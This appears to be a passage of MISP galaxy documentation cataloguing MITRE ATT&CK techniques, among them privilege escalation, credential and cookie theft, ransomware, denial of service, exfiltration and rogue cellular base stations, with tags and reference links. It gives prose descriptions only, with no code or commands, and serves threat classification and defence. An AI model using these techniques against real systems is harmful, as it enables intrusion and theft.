Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1626"

Table 5591. Table References

Links

https://attack.mitre.org/techniques/T1626

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Identify people of interest - T1269

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).

The attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Identify people of interest - T1269"

Table 5592. Table References

Links

https://attack.mitre.org/techniques/T1269

Data from Local System - T1533

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.

Access to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"

Table 5593. Table References

Links

https://attack.mitre.org/techniques/T1533

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html

Post compromise tool development - T1353

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1353).

After compromise, an adversary may utilize additional tools to facilitate their end goals. This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)

The tag is: misp-galaxy:mitre-attack-pattern="Post compromise tool development - T1353"

Table 5594. Table References

Links

https://attack.mitre.org/techniques/T1353

Credentials from Password Store - T1634

Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Password Store - T1634"

Table 5595. Table References

Links

https://attack.mitre.org/techniques/T1634

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

Generate Traffic from Victim - T1643

Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well.

If done via SMS messages, Android apps must hold the SEND_SMS permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS

The tag is: misp-galaxy:mitre-attack-pattern="Generate Traffic from Victim - T1643"

Table 5596. Table References

Links

https://attack.mitre.org/techniques/T1643

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html

Build or acquire exploits - T1349

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)

The tag is: misp-galaxy:mitre-attack-pattern="Build or acquire exploits - T1349"

Table 5597. Table References

Links

https://attack.mitre.org/techniques/T1349

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

Create infected removable media - T1355

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).

Use of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)

The tag is: misp-galaxy:mitre-attack-pattern="Create infected removable media - T1355"

Table 5598. Table References

Links

https://attack.mitre.org/techniques/T1355

Steal Application Access Token - T1635

Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft’s Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1635"

Table 5599. Table References

Links

https://attack.mitre.org/techniques/T1635

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://developer.android.com/training/app-links/index.html

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols

https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow

https://tools.ietf.org/html/rfc8252

Remote Service Session Hijacking - T1563

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563"

Table 5600. Table References

Links

https://attack.mitre.org/techniques/T1563

https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539"

Table 5601. Table References

Links

https://attack.mitre.org/techniques/T1539

https://github.com/kgretzky/evilginx2

https://github.com/muraenateam/muraena

https://securelist.com/project-tajmahal/90240/

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

Targeted social media phishing - T1366

This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).

Sending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted social media phishing - T1366"

Table 5602. Table References

Links

https://attack.mitre.org/techniques/T1366

Exfiltration Over Alternative Protocol - T1639

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1639"

Table 5603. Table References

Links

https://attack.mitre.org/techniques/T1639

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Modify Trusted Execution Environment - T1399

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device’s Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Trusted Execution Environment - T1399"

Table 5604. Table References

Links

https://attack.mitre.org/techniques/T1399

https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Masquerade as Legitimate Application - T1444

An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.

Embedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.

Pretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)

Malicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"

Table 5605. Table References

Links

http://ieeexplore.ieee.org/document/6234407

https://attack.mitre.org/techniques/T1444

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Out of Band Data - T1644

Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth.

On Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there.

On iOS, there is no way to programmatically read push notifications.

The tag is: misp-galaxy:mitre-attack-pattern="Out of Band Data - T1644"

Table 5606. Table References

Links

https://attack.mitre.org/techniques/T1644

Network Denial of Service - T1464

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices.

A Network DoS will occur when an adversary is able to jam radio signals (e.g. Wi-Fi, cellular, GPS) around a device to prevent it from communicating. For example, to jam cellular signal, an adversary may use a handheld signal jammer, which jam devices within the jammer’s operational range.(Citation: NIST-SP800187)

Usage of cellular jamming has been documented in several arrests reported in the news.(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)

The tag is: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1464"

Table 5607. Table References

Links

http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf

https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/

https://attack.mitre.org/techniques/T1464

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html

https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html

https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html

https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/

https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/

https://www.nytimes.com/2007/11/04/technology/04jammer.html

Compromise Client Software Binary - T1554

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)

Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554"

Table 5608. Table References

Links

https://attack.mitre.org/techniques/T1554

https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n

https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf

Compromise Client Software Binary - T1645

Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1645"

Table 5609. Table References

Links

https://attack.mitre.org/techniques/T1645

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://source.android.com/security/verifiedboot/

Abuse Elevation Control Mechanism - T1548

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548"

Table 5610. Table References

Links

https://attack.mitre.org/techniques/T1548

Replication Through Removable Media - T1458

Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include:

  • Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB)

  • Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal)

  • Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices using physical access to the data port to unlock the passcode.(Citation: Computerworld-iPhoneCracking)

The tag is: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1458"

Table 5611. Table References

Links

http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/

https://attack.mitre.org/techniques/T1458

https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html

https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf

https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html

https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html

https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/

https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html

Downgrade to Insecure Protocols - T1466

An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade to Insecure Protocols - T1466"

Table 5612. Table References

Links

http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf

https://attack.mitre.org/techniques/T1466

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html

Rogue Cellular Base Station - T1467

An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467"

Table 5613. Table References

Links

http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html

https://attack.mitre.org/techniques/T1467

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html

Data Encrypted for Impact - T1486

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)

In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"

Table 5614. Table References

Links

https://attack.mitre.org/techniques/T1486

https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary

https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://www.us-cert.gov/ncas/alerts/AA18-337A

https://www.us-cert.gov/ncas/alerts/TA16-091A

https://www.us-cert.gov/ncas/alerts/TA17-181A

Exploit via Radio Interfaces - T1477

The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.

Baseband Vulnerability Exploitation

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).

Malicious SMS Message

An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477"

Table 5615. Table References

Links

http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html

http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/

https://attack.mitre.org/techniques/T1477

https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html

https://srlabs.de/bites/rooting-sim-cards/

https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf

Network Denial of Service - T1498

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).

The tag is: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498"

Table 5616. Table References

Links

https://attack.mitre.org/techniques/T1498

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html

https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf

Endpoint Denial of Service - T1499

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target’s resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)

For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

The tag is: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499"

Table 5617. Table References

Links

https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/

https://attack.mitre.org/techniques/T1499

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html

https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf

https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf

Credentials from Password Stores - T1555

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"

Table 5618. Table References

Links

https://attack.mitre.org/techniques/T1555

Exfiltration Over Web Service - T1567

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567"

Table 5619. Table References

Links

https://attack.mitre.org/techniques/T1567

Exploitation for Client Execution - T1658

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries may take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Adversaries may use device-based zero-click exploits for code execution. These exploits are powerful because there is no user interaction required for code execution.

SMS/iMessage Delivery

SMS and iMessage in iOS are common targets through [Drive-By Compromise](https://attack.mitre.org/techniques/T1456), [Phishing](https://attack.mitre.org/techniques/T1660), etc. Adversaries may use embed malicious links, files, etc. in SMS messages or iMessages. Mobile devices may be compromised through one-click exploits, where the victim must interact with a text message, or zero-click exploits, where no user interaction is required.

AirDrop

Unique to iOS, AirDrop is a network protocol that allows iOS users to transfer files between iOS devices. Before patches from Apple were released, on iOS 13.4 and earlier, adversaries may force the Apple Wireless Direct Link (AWDL) interface to activate, then exploit a buffer overflow to gain access to the device and run as root without interaction from the user.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1658"

Table 5620. Table References

Links

https://attack.mitre.org/techniques/T1658

Search Open Technical Databases - T1596

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Open Technical Databases - T1596"

Table 5621. Table References

Links

https://attack.mitre.org/techniques/T1596

https://dnsdumpster.com/

https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

https://shodan.io

https://www.circl.lu/services/passive-dns/

https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

https://www.sslshopper.com/ssl-checker.html

https://www.whois.net/

Modify Cloud Compute Infrastructure - T1578

An adversary may attempt to modify a cloud account’s compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)

